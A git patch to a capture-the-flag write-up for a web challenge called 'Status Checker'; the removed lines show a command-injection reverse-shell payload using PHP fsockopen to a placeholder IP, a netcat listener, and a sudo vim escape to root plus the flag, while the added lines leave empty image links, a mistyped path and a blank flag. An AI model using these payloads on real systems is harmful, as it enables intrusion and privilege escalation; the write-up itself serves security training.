From ac86a16cc4a044feb41ea7fd3253c7c836fa29e9 Mon Sep 17 00:00:00 2001 From: Twi <31920608+gzavz@users.noreply.github.com> Date: Thu, 18 Apr 2024 21:27:19 +0800 Subject: [PATCH] Update writeup.md --- challenges/web/Status Checker/writeup.md | 36 ++++-------------------- 1 file changed, 5 insertions(+), 31 deletions(-) diff --git a/challenges/web/Status Checker/writeup.md b/challenges/web/Status Checker/writeup.md index 0b42da6..ba15b92 100644 --- a/challenges/web/Status Checker/writeup.md +++ b/challenges/web/Status Checker/writeup.md @@ -8,38 +8,12 @@ Entering a semi-colon (;) will break the command. We can try to use the payload ![wimg-2](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-2.png) -We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot. +We can attempt to use the command ``sudo -l``. We can see that we are able to run any command as sudo without a password as seen in the followings screenshot. -![wimg-3](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-3.png) +![wimg-3]() -Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address. +We can attempt to use the command ``sudo ls /root/`` to list the root directory. We can see that there is a file called ``flag.txt`` as seen in the following screenshot. -``` -; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");' -``` +![wimg-4]() -Input the above payload into the input box as seen in the following screenshot. - -![wimg-4](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-4.png) - -Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot. - -![wimg-5](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-5.png) - -We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. We can use the command ``sudo -l`` and see that we can run the command ``vim`` as root without a password as seen in the following screenshot. - -![wimg-6](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/64886584ff8936fb97898bbd2e3c574d9482bacc/challenges/web/Status%20Checker/images/wimg-6.png) - -Using GTFOBins, we are able to breakout and obtain a shell as a root user using the following command: - -``` -vim -c ':!/bin/sh' -``` - -Using the command ``whoami`` we can see that we are now the root user as seen in the following screenshot. - -![wimg-7](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/64886584ff8936fb97898bbd2e3c574d9482bacc/challenges/web/Status%20Checker/images/wimg-7.png) - -We can obtain the flag in the root directory by using the command ``cd /root`` and ``cat flag.txt``. - -The flag is ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``. +We can read the contents of the file by using the command ``cat /roo/flag.txt``. The flag is: ````